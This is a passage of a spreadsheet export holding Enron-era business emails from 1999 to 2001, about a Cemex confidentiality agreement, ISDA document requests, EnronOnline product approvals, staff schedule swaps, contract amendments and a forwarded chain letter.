_x000D_
"CINDY EVANGELISTA" &lt;CINDY_EVANGELISTA@cemexusa.com&gt; on 12/20/99 09:19:53 AM_x000D_
_x000D_
To:   Mark Taylor/HOU/ECT@ECT_x000D_
cc:_x000D_
Subject:  Re: Confidentiality Agreement_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mark,_x000D_
_x000D_
What is the address I need to send the agreement to?  Please let me know and I_x000D_
will have it sent over by messenger._x000D_
_x000D_
Thanks!_x000D_
_x000D_
Cindy_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Mark Taylor" &lt;mtaylo1@ect.enron.com&gt; on 12/20/99 08:34:26 PM_x000D_
_x000D_
To:   GARY BURNS@CEMEX_x000D_
cc:   CINDY EVANGELISTA@CEMEX, "George Zivic" &lt;gzivic@ect.enron.com&gt;_x000D_
Subject:  Re: Confidentiality Agreement_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
As per Gary's request, here is the revised letter.  If you will send the_x000D_
executed copies to me, I will arrange to have them signed on behalf of Enron._x000D_
_x000D_
(See attached file: CA-CEMEX-ENA.doc)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"GARY BURNS" &lt;GARY_BURNS@cemexusa.com&gt; on 12/17/99 01:40:46 PM_x000D_
_x000D_
To:   Mark Taylor/HOU/ECT@ECT_x000D_
cc:   "CINDY EVANGELISTA" &lt;CINDY_EVANGELISTA@cemexusa.com&gt;_x000D_
Subject:  Re: Confidentiality Agreement_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mark,_x000D_
      The Confidentiality Agreement must be addressed to Enron and printed on_x000D_
Cemex letterhead, so please send the modified document to Cindy in an _x000D_
electronic_x000D_
format (ie Word via email).  Cindy will then print out two originals on our_x000D_
letterhead and send you both originals for signature by Enron.   Thanks, GPB_x000D_
_x000D_
---------------------- Forwarded by GARY BURNS/Tex/Usa/Cemex on 12/17/99 07:37_x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
GARY BURNS_x000D_
12/17/99 07:21 PM_x000D_
_x000D_
To:   "Mark Taylor" &lt;mtaylo1@ect.enron.com&gt; @ CEMEXUSA_x000D_
cc:   CINDY EVANGELISTA/Tex/Usa/Cemex@CEMEX_x000D_
Subject:  Re: Confidentiality Agreement_x000D_
_x000D_
Mark,_x000D_
       Our attorney said that modifying the attached Agreement so that the_x000D_
protected party is " CEMEX USA Management, Inc., as well as its affiliates_x000D_
(CEMEX), " is acceptable.  Please make the required changes and send the_x000D_
document to my secretary, Cindy Evangelista.   I am on vacation until _x000D_
1/4/2000,_x000D_
but will try to progress the signing of the Agreement while I'm gone.  _x000D_
Regards,_x000D_
GPB_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Mark Taylor" &lt;mtaylo1@ect.enron.com&gt; on 12/15/99 11:29:49 PM_x000D_
_x000D_
To:   GARY BURNS@CEMEX_x000D_
cc:_x000D_
Subject:  Confidentiality Agreement_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Here is the Confidentiality Agreement we signed last year._x000D_
_x000D_
(See attached file: CA - Cemex2.doc)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - CA - Cemex2.doc_x000D_
 - CA-CEMEX-ENA.doc_x000D_
</t>
  </si>
  <si>
    <t>Mon, 5 Mar 2001 23:28:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Request for ISDA and Other Documents for Warm Springs Tribe</t>
  </si>
  <si>
    <t xml:space="preserve">Could you please assign this to the propoer paralegal.  You can reach me at _x000D_
503-464-3810.  Thanks._x000D_
_x000D_
_x000D_
Stewart_x000D_
_x000D_
_x000D_
 ---------------------- Forwarded by Stewart Rosman/HOU/ECT on 03/06/2001 _x000D_
09:25 AM ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  Jeff Fuller &lt;JFuller@prmllp.com&gt;                           03/05/2001 _x000D_
05:29 PM_x000D_
	_x000D_
_x000D_
To: "'Stewart Rosman'" &lt;Stewart.Rosman@enron.com&gt;_x000D_
cc: Loren Baker &lt;LBaker@prmllp.com&gt;, "'Rawleigh White'"  _x000D_
&lt;rwhite@wstribes.org&gt; _x000D_
Subject: Request for ISDA and Other Documents for Warm Springs Tribe_x000D_
_x000D_
_x000D_
Stewart, effective 1/1/2002, the Warm Springs Tribe will be purchasing a 1/3_x000D_
share of PGE's Pelton/Round Butte Project.  They will be selling the output_x000D_
to PGE at prices indexed to the Dow Jones Mid-Columbia Index, and are_x000D_
interested in executing financial swaps to manage their market price risk._x000D_
Would you please forward on to me drafts of the legal documents that will be_x000D_
required to execute financial transactions (e.g., ISDA, legal opinion,_x000D_
etc.).  As with my previous request pertaining to the public utilities we_x000D_
are working with, I ask that Sara Shackleton be assigned to this.  Thanks_x000D_
for your help.  I think we are interested in moving fairly quickly to get_x000D_
the necessary documentation in place._x000D_
_x000D_
Jeff_x000D_
</t>
  </si>
  <si>
    <t>Wed, 18 Oct 2000 12:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'drew.lynch@enron.com'})</t>
  </si>
  <si>
    <t>Employee Issue</t>
  </si>
  <si>
    <t>Drew,_x000D_
_x000D_
Louise and Robert have brought me into the loop on the employee in London who _x000D_
has had some issues.  I would appreciate it if you would fax me a copy of his _x000D_
agreement.  I will be out of the office tomorrow, so, if possible, could you _x000D_
fax it to my house first thing in the morning?  713-218-7355 is the fax _x000D_
number.  If you send it around 5:30 am Houston time, then I can have time to _x000D_
review it and incorporate its provisions into the draft correspondence that I _x000D_
will prepare on this topic.  I am going to be attending a seminar out of the _x000D_
office starting around 8:00 am Houston time._x000D_
_x000D_
I will prepare draft correspondence and circulate it to you, Robert, and _x000D_
Louise for comment and dart-throwing.  I can be reached via my cell phone _x000D_
during the day at 713-302-5522._x000D_
_x000D_
Thanks, Drew._x000D_
_x000D_
Michelle</t>
  </si>
  <si>
    <t>Tue, 21 Mar 2000 03:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: FW: You know</t>
  </si>
  <si>
    <t>funny.  Oh my poor foot.  Noone cares about me.</t>
  </si>
  <si>
    <t>Tue, 13 Nov 2001 12:28:47 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'m..presto@enron.com', 'elizabeth.sager@enron.com'})</t>
  </si>
  <si>
    <t>VEPCO</t>
  </si>
  <si>
    <t>Kevin and Elizabeth,_x000D_
_x000D_
Attached is a proposal summarizing our restructuring talks with VEPCO last week.  We had proposed to them what Kevin had suggested, and they said their view on pricing in Virginia is slightly different (at a discount to PJM/VAP as against a premium suggested by us).  They'd requested we send them some discussion points from our meeting today, so we can continue our discussions on an ongoing basis. Please review the bullet-point summary of our discussions last week, and the draft proposal.  We would appreciate your quick comments - but keep in mind, this is just to stimulate further discussions with them. Our overall objective is to migrate them to a new contract and away from their rights to audit the last few years._x000D_
_x000D_
Discussion summary:_x000D_
Both parties agree that the contract needs to be revised to reflect current market conditions (pricing, liquidated damages, etc.)._x000D_
Enron would retain flexibility around the physical delivery points._x000D_
VEPCO would like to continue treating this as a call option (versus a firm delivery)._x000D_
Settlement:  Would prefer the Day-Ahead index versus the hourly index_x000D_
Could also look at another PJM West index - VAP/Alleghany_x000D_
Will look at alternate times for calling on power, if necessary_x000D_
Would like to renegotiate by 12/01/01_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
Rahil</t>
  </si>
  <si>
    <t>Mon, 18 Sep 2000 09:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>looks like we are going to have to find a couple of loser fijis who can't _x000D_
find dates for the tennessee game and lift their tickets.  i am so fired up _x000D_
for that game.  tim just told me it is the 6:30 game on espn.</t>
  </si>
  <si>
    <t>Tue, 6 Nov 2001 14:55:21 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'carrie.larkworthy@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'don.baughman@enron.com', 'punit.rawal@enron.com'})</t>
  </si>
  <si>
    <t>RE: Swap work schedules?</t>
  </si>
  <si>
    <t>Don and Punit:_x000D_
_x000D_
The switch is set.  Punit will take two days for me in November and I'll pick up his two in December. The changes are already in the schedule.  Don, if you have any problems with this--please let us know._x000D_
_x000D_
Thanks_x000D_
Carrie_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Rawal, Punit  _x000D_
Sent:	Tuesday, November 06, 2001 4:36 PM_x000D_
To:	Garcia, Miguel L.; Larkworthy, Carrie; Trejo, Reese; Blaine, Jay; Maskell, David; Errigo, Joe; Berlin, Jason; Reves, Brant; Laurent, Dean; Baughman Jr., Don_x000D_
Subject:	Swap work schedules?_x000D_
_x000D_
Hi Desk,_x000D_
_x000D_
I need to swap off the last 2 days of this yr a.k.a the 30th and the 31st of dec cos I already have a ski trip planned over the end of the yr starting post christmas. I am working days on the aforementioned dates (thank god for small mercies..so no one has to disrupt their new-yr nite plans) so with all the holiday pay and a chance to take off any 2 days from now till then and have me fill em in for u..should i hope entice someone at least._x000D_
_x000D_
Here's to waiting for your +ve replies._x000D_
_x000D_
Cheers,_x000D_
_x000D_
_x000D_
Punit.</t>
  </si>
  <si>
    <t>Mon, 27 Mar 2000 06:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>TW RP99-335</t>
  </si>
  <si>
    <t xml:space="preserve">I have no great interest in appealing the FERC order denying rehearing.  This _x000D_
one is a loser as it was decided on TW-specific facts and I see no clear _x000D_
inconsistency between FERC's various orders on revenue sharing.   Unless _x000D_
someone feels strongly to the contrary, lets punt.  Thanks. DF </t>
  </si>
  <si>
    <t>Mon, 27 Dec 1999 06:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>January 2000 Volume</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Chris Germany/HOU/ECT on 12/27/99 02:17 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
pdrexel@columbiaenergygroup.com on 12/27/99 02:03:03 PM_x000D_
To: Dan Junek/HOU/ECT@ECT, Chris Germany/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: January 2000 Volume_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Paul Drexelius/CES/ColumbiaGas on_x000D_
12/27/2000 02:09 PM ---------------------------_x000D_
_x000D_
_x000D_
Heidi Boyd_x000D_
12/27/99 02:04 PM_x000D_
_x000D_
To: 8145895507&amp;Lori Bunce&amp;BeldonBlake@mailfax_x000D_
cc: Noel Bartlo/CES/ColumbiaGas@ColumbiaGas, Paul_x000D_
Drexelius/CES/ColumbiaGas@ColumbiaGas, John Singer/CES/ColumbiaGas@ColumbiaGas_x000D_
Subject: January 2000 Volume_x000D_
_x000D_
Hi Lori,_x000D_
_x000D_
I believe we are still pulling our Local Production from you behind NYSEG,_x000D_
please let me know ASAP if you disagree._x000D_
_x000D_
I am going to pull    1620 dth's/day  , again, let me know if this creates a_x000D_
problem for you._x000D_
_x000D_
Thanks!_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 13 Mar 2001 00:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jorge.garcia@enron.com'})</t>
  </si>
  <si>
    <t>Equity Swap ISDA Confirmation</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning Sara,_x000D_
_x000D_
Per your request, here is the preliminary confirmation for the Total Return _x000D_
Equity Swap with Enron Europe._x000D_
_x000D_
Regards,_x000D_
_x000D_
Jorge_x000D_
</t>
  </si>
  <si>
    <t>Mon, 22 Jan 2001 09:43:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Congratulations!</t>
  </si>
  <si>
    <t>Sally,_x000D_
_x000D_
Congratulations on the promotion to Managing Director!!!!!! VERY WELL _x000D_
deserved.  Continued success._x000D_
_x000D_
Liz Taylor</t>
  </si>
  <si>
    <t>Mon, 5 Feb 2001 01:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'david.jones@enron.com', 'thomas.martin@enron.com', 'greg.cordell@enron.com', 'gary.lamphier@enron.com'})</t>
  </si>
  <si>
    <t>Request for Proposal - Gas IN Tx</t>
  </si>
  <si>
    <t xml:space="preserve">I'm not sure who should respond. PLease let me know which one of you decides _x000D_
to respond_x000D_
Thanks_x000D_
Jen_x000D_
---------------------- Forwarded by Jennifer Fraser/HOU/ECT on 02/05/2001 _x000D_
09:59 AM ---------------------------_x000D_
_x000D_
_x000D_
"Chuck Pavlica" &lt;cpavlica@enerad.com&gt; on 02/05/2001 08:24:29 AM_x000D_
To: "Prospective Natural Gas Supplier" &lt;cpavlica@enerad.com&gt;_x000D_
cc:  _x000D_
Subject: Request for Proposal_x000D_
_x000D_
_x000D_
_x000D_
Attached is a Request for Proposal on behalf of  Gulf Chemical &amp; _x000D_
Metallurgical Corporation in Freeport, Texas.?  Estimated daily consumption _x000D_
is 867 MMBtu/d.? Proposals are due by February  16, 2001 at 5:00p.m._x000D_
?_x000D_
Chuck Pavlica_x000D_
Energy Advantage Corporation_x000D_
440 Benmar Dr., Suite 1060_x000D_
Houston, TX? 77060_x000D_
(281) 447-7376 ext. 117_x000D_
(281) 447-7310 fax_x000D_
email:? cpavlica@enerad.com_x000D_
 - Gulf Chemical RFP.pdf_x000D_
</t>
  </si>
  <si>
    <t>Mon, 20 Nov 2000 03:42:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'brian.gillis@enron.com'})</t>
  </si>
  <si>
    <t>Re: Draft of modified DPR</t>
  </si>
  <si>
    <t xml:space="preserve">Brian,_x000D_
_x000D_
This file look good.  Are you still using the FTCD file?  If you are, please _x000D_
let me know to what trader to assign the P&amp;L.  _x000D_
_x000D_
Thanks._x000D_
Robin_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Brian Gillis_x000D_
11/20/2000 10:59 AM_x000D_
To: Robin Rodrigue/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Draft of modified DPR_x000D_
_x000D_
Robin, let me know if this works - if so, I'll go out and save it on your _x000D_
drive right now._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 1 Dec 2000 07:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Attached Files</t>
  </si>
  <si>
    <t xml:space="preserve">  Kay,_x000D_
 I've been working on the break out agreements for CA Energy_x000D_
Development at Peter Thompson's request (attached).  As you mentioned,_x000D_
we need the site specific information to complete the agreements;_x000D_
however, there are a few additional points that I wanted to bring to_x000D_
your attention:_x000D_
_x000D_
1.  Please confirm that Unit 17 is going to CA Energy Development I, and_x000D_
Unit 18 is going to CA Energy Development II._x000D_
_x000D_
2.  The document needs a fax number for Ben Jacoby and the Agreement_x000D_
Reference number._x000D_
_x000D_
3.  I need to get the cost of the dual fuel option so I can calculate_x000D_
the maximum liability amount. (Peter mentions that there's a change_x000D_
order 1.  Do you have that available?)  Also, I assume that we'll simply_x000D_
add the dual fuel cost to the contract value to calculate the maximum_x000D_
liability amount and add 25% of the dual fuel cost to the January_x000D_
payment to arrive at the new payment amount.  Is this correct, or is_x000D_
there another way it should be done?_x000D_
_x000D_
4.  Also, I need the unit serial numbers if you'd like them included in_x000D_
the agreement._x000D_
_x000D_
5.  Will the Retention Letter of Credit be structured differently now_x000D_
that only one turbine is being sold per agreement? (I'm assuming that_x000D_
the figure will be 5% of the purchase price after the dual fuel cost is_x000D_
included)._x000D_
_x000D_
That's all I have for now.  Peter has been in a conference call all_x000D_
afternoon, so if you've already given some or all of this information to_x000D_
him, please let me know.  You can reach me via e-mail or at (202)_x000D_
662-3016.  Thanks, Chris_x000D_
 &lt;&lt;break out agreement--CA Energy Devlopment II (12/1/00).DOC&gt;&gt;_x000D_
&lt;&lt;Breakout Agreement: CA Energy 12/1/00.DOC&gt;&gt; _x000D_
 - 00).DOC_x000D_
 - 00.DOC</t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 18:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Melba,_x000D_
	I need to have a new physical gas, day product set up as soon as possible.  The point will be Northern Border Pipeline at the Harper Transfer Point NBPL/Harp TP).    The point is in Keokuk county in Harper,Iowa  If you have any further questions please call me at 3-1929.  Thanks for your help.</t>
  </si>
  <si>
    <t>Tue, 1 May 2001 17:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'steve.hotte@enron.com'})</t>
  </si>
  <si>
    <t>employee referral</t>
  </si>
  <si>
    <t xml:space="preserve">I figured this posting belonged to one of you.  Please see the message from Danny Jones._x000D_
---------------------- Forwarded by Stanley Horton/Corp/Enron on 05/01/2001 02:27 PM ---------------------------_x000D_
_x000D_
_x000D_
Danny_Jones%ENRON@eott.com on 04/30/2001 01:39:56 PM_x000D_
To:	stan.horton@enron.com_x000D_
cc:	 _x000D_
_x000D_
Subject:	employee referral_x000D_
_x000D_
_x000D_
Dear Mr. Horton,  I have recently been made aware of a help desk analyst_x000D_
job#0000108806 that has become available in your department. I am currently_x000D_
employed with the aviation department (hangar attendant) of enron and would_x000D_
like to use my past knowledge and experience to persue my goals in the_x000D_
technology feild. I am asking respectfully if you could give me a_x000D_
recommendation or referral to ETS technology department. Anything you could_x000D_
do to help further my goals would be appreciated._x000D_
_x000D_
_x000D_
_x000D_
          Respectfully,_x000D_
          Danny Jones_x000D_
     281-443-3744 smithjones@ev1.net_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 10:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Long descriptions</t>
  </si>
  <si>
    <t xml:space="preserve">	Kevin Meredith@ENRON_x000D_
	04/02/2001 10:42 AM_x000D_
		 _x000D_
		 To: Mark Taylor/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Long descriptions_x000D_
_x000D_
Mark,_x000D_
_x000D_
I have attached two word documents for your review, both of which contain the _x000D_
two long descriptions.  The document with filename TAS Descriptions most _x000D_
likely will be two new product types.  The other document (Nymex-GC Spreads) _x000D_
shows the long descriptions for the existing product type US HeatOil2 Fin _x000D_
Spread and US UNL Fin Spread.  We will create a new index for each of these _x000D_
product types that will be the Nymex vs Gulf Coast prices for the commodity.  _x000D_
Savita has reviewed each of these documents and her only concern is how we _x000D_
capture the "Trade Date" for the TAS products.  These products have been _x000D_
requested by Larry Gagliardi, Phil Clifford, and John Wilson.  Please let me _x000D_
know your thoughts._x000D_
_x000D_
Thank you._x000D_
Kevin_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 15 May 2000 00:54:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tim_x000D_
_x000D_
Please add bookrunners names beside the books on your P/L.</t>
  </si>
  <si>
    <t>Thu, 15 Nov 2001 09:27:59 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dmclolinger@yahoo.com'})</t>
  </si>
  <si>
    <t>sorry, but i didn't get your message until late.  i'll call you at home tonight._x000D_
_x000D_
-----Original Message-----_x000D_
From: David Clolinger [mailto:dmclolinger@yahoo.com]_x000D_
Sent: Tuesday, November 13, 2001 11:09 AM_x000D_
To: Ruscitti, Kevin_x000D_
Subject: test_x000D_
_x000D_
_x000D_
test_x000D_
_x000D_
_x000D_
_x000D_
___________________________________________________x000D_
Do You Yahoo!?_x000D_
Find the one for you at Yahoo! Personals_x000D_
http://personals.yahoo.com</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 01:30:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bjorn.hagelmann@enron.com', 'jeff.blumenthal@enron.com', 'mark.friedman@enron.com', 'stephen.douglas@enron.com', 'hou@enron.com', 'tom.moran@enron.com', 'mark.taylor@enron.com', 'rudi.zipter@enron.com'})</t>
  </si>
  <si>
    <t>NEW ENRONONLINE PRODUCTs - PLEASE APPROVE (2 of 2)</t>
  </si>
  <si>
    <t xml:space="preserve">Your review and approval of the following two product type in the EOL _x000D_
Datamanager is urgently needed (for directions on approval , please see steps _x000D_
for approval at the bottom of this e-mail).  _x000D_
_x000D_
Trader :  John Suarez _x000D_
_x000D_
Note:  THESE BANDWIDTH IP TRANSPORT PRODUCT TYPES HAVE BEEN CREATED FOR THE _x000D_
ANDERSEN CONSULTING ANALYST DEMONSTRATION PURPOSES ONLY.   THE  PRODUCT TYPES _x000D_
WILL BE ARCHIVED ONCE THE DEMO IS COMPLETE._x000D_
_x000D_
_x000D_
Example:_x000D_
_x000D_
US WTI Basis  Platts LLS            Jan01      USD/bbl_x000D_
_x000D_
Physical Description :_x000D_
 _x000D_
Product Type:   US Bandwidth Premium Service IP Transport Phy Fwd_x000D_
Commodity: Bandwidth - Premium Service IP Transport_x000D_
Currency:     USD_x000D_
Default UOM:   Mbps_x000D_
Country:   USA_x000D_
_x000D_
Physical Description (e.g):_x000D_
A US Bandwidth Transaction with Enron Broadband Services, L.P. ("EBS") _x000D_
pursuant to which the Seller shall sell and the Buyer shall buy the quantity _x000D_
of Bandwidth Units for Premium Service IP Transport submitted by Counterparty _x000D_
via the Website. The Performance Metrics for Premium Service IP Transport _x000D_
shall be as follows:  Jitter shall be 16 milliseconds One Way; Latency shall _x000D_
be 80 milliseconds or less; Packet Loss shall be less than 1% per month;  _x000D_
Availability shall be 99.99% of available hours. The price shall be as _x000D_
submitted by the Counterparty via the Website.  The quantity of Bandwidth _x000D_
Units for Premium Service IP Transport transacted via the website shall _x000D_
represent the reservation on capacity and the actual usage shall represent _x000D_
the volume actually sold by the Seller and purchased by the Buyer.   Any _x000D_
party entering into a Transaction to buy or sell Bandwidth Premium Service _x000D_
Units from or to EBS shall be responsible for connecting to the Demarcation _x000D_
Point located at each applicable Point of Presence. In order to achieve such _x000D_
connectivity, a party may incur costs and expenses and may additionally be _x000D_
required to execute certain documentation._x000D_
_x000D_
The Term of the Transaction shall correspond to the date(s) set forth in the _x000D_
product short description on the website; the first such date shall be the _x000D_
Effective Date and the last such date shall be the Termination Date.  The _x000D_
Term of the Transaction shall begin at 12:00 a.m. (prevailing local time at _x000D_
the EBS Point of Presence) on the Effective Date and continue to 11:59:59 _x000D_
p.m. (prevailing local time at the EBS Point of Presence) on the Termination _x000D_
Date. Each applicable calendar month during the Term of the Transaction shall _x000D_
be considered a Period.  The transaction shall be for IP Transport at the EBS _x000D_
Point of Presence in Seattle (2001 6th Ave., Eleventh Floor, Suite 1150, _x000D_
Seattle, WA 98121, NPA-NXX:  206-770, CLLI:  STTLWAWBH78)._x000D_
_x000D_
The price is quoted in US Dollars per unit of volume, which will be the _x000D_
Contractual Currency._x000D_
_x000D_
The unit of volume against which the Unit Price is quoted is the Megabits per _x000D_
second for a Period and the quantity shown on the website shall be the _x000D_
available number of Megabits per second for a Period.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Thanks - Rob Cass  -  Melba Lozano_x000D_
x35491   x58986_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 21 Nov 2000 08:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'stacey.neuweiler@enron.com'})</t>
  </si>
  <si>
    <t>Communicating Effectively course offering</t>
  </si>
  <si>
    <t>Daren-_x000D_
_x000D_
There is an effective communication course on December 7 (Thursday) from _x000D_
1-5pm.  Is this the one you suggested for me, and if it is, may I attend this _x000D_
one?  Please let me know.  It is listed through Ernie and is $200.  Thanks _x000D_
for looking into this.</t>
  </si>
  <si>
    <t>Fri, 21 Jul 2000 03:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>SECOND AMENDMENT TO</t>
  </si>
  <si>
    <t>These are changes Idacorp would like to make to our amendment.  Would you _x000D_
look over these?   _x000D_
_x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Corp._x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron.com_x000D_
Phone 713-853-7658_x000D_
Fax  713-646-3490_x000D_
_x000D_
----- Forwarded by Debra Perlingiere/HOU/ECT on 07/21/2000 10:49 AM -----_x000D_
_x000D_
	"Catherine, Michelle" &lt;MCatherine@idahopower.com&gt;_x000D_
	07/18/2000 12:30 PM_x000D_
		 _x000D_
		 To: "'dperlin@enron.com'" &lt;dperlin@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: SECOND AMENDMENT TO_x000D_
_x000D_
_x000D_
_x000D_
Hi,  Debra:_x000D_
I left  you a voice mail about the partial force majeure and I'll wait to _x000D_
hear from you  once you get feedback from credit on thresholds and from legal _x000D_
on cross  default.? The attached document includes our notice  information._x000D_
Regards,_x000D_
Michelle_x000D_
IDACORP Energy_x000D_
 - Enron IDACORPEnergyAmendment(June299).doc</t>
  </si>
  <si>
    <t>Mon, 4 Dec 2000 07:41:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bgarcia@galena-park.isd.tenet.edu', 'faye.ellis@enron.com', 'sandra.mcnichols@enron.com', 'adrial.boals@enron.com', 'lstevens@wt.net', 'balice@nortelnetworks.com', 'amber.ebow@enron.com', 'beckybeltran@hotmail.com', 'marilyn.rivera@enron.com', 'marvia.jefferson@enron.com', 'judy.hernandez@enron.com'})</t>
  </si>
  <si>
    <t>Add Yours...</t>
  </si>
  <si>
    <t>&gt; &gt;&gt;&gt;&gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;WE ARE TRYING TO GET A LIST OF 2002 CHRISTIANS BEFORE THE YEAR_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;2001. WE HOPE YOU CAN FIND THE TIME TO SIGN IT AND SEND IT TO ALL_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;YOUR FRIENDS. I REALLY HOPE THAT THERE ARE 2001 CHRISTIANS IN THIS_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;WORLD._x000D_
&gt; &gt;&gt;&gt;&gt; &gt;SO PLEASE SIGN THIS AND SEND IT TO ALL YOUR FRIENDS._x000D_
&gt; &gt;&gt;&gt;&gt; &gt;_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;1. Marydith Kurzel..............Rutland,VT_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;2. LAVONNE TERREL...............FOLLETT,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;3. A.C. Cotney..................Follett,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;4. Marlene Pierce...............Lubbock,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;5. Adrianne Head................Denton,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;6. Talana Hamilton..............Plano,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;7. Julie Heinrich...............College Station,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;8. Kevin Tucker.................College Station,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;9. Alan Peters..................Baton Rouge,LA_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;10. Joni Hunter.................Monroe,LA_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;11. Cory Russell................Ruston,LA_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;12. Casey Hickingbottom.........Crowville,LA_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;13. Ronda Cockerham.............Crowville,LA_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;14. Keith Ashley................Center,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;15. Carla Doudna................Center,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;16. Lacy Holder.................Center,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;17. Nancy Adams.................Center,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;18. Haley Snider................Center,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;19. Lindsey McDonald............Center,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;20. Brent Yarbrough.............Center,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;21. Kendra Elms.................Portales,NM_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;22. Jana Rector-Portales........Portales,NM_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;23. Tessa Renae Rackler.........Portales,NM_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;24. Kim Siau....................Portales,NM_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;25. Patty Ochoa.................Golden,CO_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;26. Shawna Slatter..............Portales,NM_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;27. Anthony Below...............Lubbock,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;28. Candice Corliss.............Lubbock,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;29. Tom Wuensche................Columbus,IN_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;30. Amy Wuensche................Lubbock,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;31. April Finck.................Lubbock,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;32. Jaime Coy...................Lubbock,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;33. Katie Whitsett..............Lubbock,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;34. Susan Fite..................Lubbock,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;35. Paige Borsch................(unknown)_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;36. Courtney Clayton............Lubbock,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;37. Kelley Clayton..............Houston,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;38. Liz Junell..................Houston,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;39. Ryan Plank..................Houston,TX_x000D_
&gt; &gt;&gt;&gt;&gt; &gt;40. Meier Moore.................Houston,TX_x000D_
